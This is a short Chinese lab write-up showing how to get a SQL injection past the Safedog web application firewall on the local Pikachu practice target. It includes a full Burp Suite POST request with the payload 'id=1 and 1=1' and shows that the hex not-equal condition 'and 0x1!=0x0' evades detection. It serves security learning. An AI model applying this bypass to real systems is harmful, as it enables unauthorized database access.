WAF绕过 -- and判断

简介: WAF绕过 -- and判断

一、环境


2、Pikachu靶机


3、安全狗最新版


0a2653c851af460fa595bd959398a8f1.png


二、BurpSuite2022抓包,点击获取下载地址


1、正常访问结果


0eacb84100b54626af849e6b562bf92a.png


2、抓取POST包,并修改,加入and 1=1,提示被拦截


POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: localhost
Content-Length: 21
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/pikachu/vul/sqli/sqli_id.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=vm1gpr93kn5nat0e23qft4tsg7
Connection: close
id=1 and 1=1&submit=1


2d65d23f6d4748949b924e4057485923.png


3、将and 1=1修改为and 0x1!=0x1肯定不成立,返回不存在,再修改为and 0x1!=0x0,返回用户名,说明“十六进制+不等于”可以绕过该WAF。


2e9b90b2ca334476abebe75bafe6eeaa.png 4cebaac233b3433da32a72337a77fc60.png


禁止非法,后果自负

目录
相关文章
|
7月前
|
存储 安全 网络协议
绕过WAF和多个防护软件提权案例
绕过WAF和多个防护软件提权案例
96 0
|
2月前
|
数据库
最简单的WAF绕过方式
最简单的WAF绕过方式
96 0
|
11月前
|
SQL 安全 网络安全
SQL注入-WAF绕过
SQL注入-WAF绕过
|
安全
WAF绕过 -- and判断
WAF绕过 -- and判断
85 0
WAF绕过 -- and判断
|
数据库
最简单的WAF绕过方式
最简单的WAF绕过方式
737 0
最简单的WAF绕过方式
|
数据采集 安全 数据库
某教程学习笔记(一):23、WAF绕过
某教程学习笔记(一):23、WAF绕过
226 0
某教程学习笔记(一):23、WAF绕过
|
程序员 Shell 测试技术
文件上传-PHP异或绕过WAF
文件上传-PHP异或绕过WAF
文件上传-PHP异或绕过WAF
|
SQL 安全 数据库
sqli笔记-基于错误的SQL注入与WAF绕过
正文 测试的是登陆功能,此功能会向数据库发送查询的请求,这里我们仔细来看一下,获取我的数据并通过 POST 请求发送。 工具使用的是Burp Suite,这里拦截了请求并将其发送到repeater:
262 0
sqli笔记-基于错误的SQL注入与WAF绕过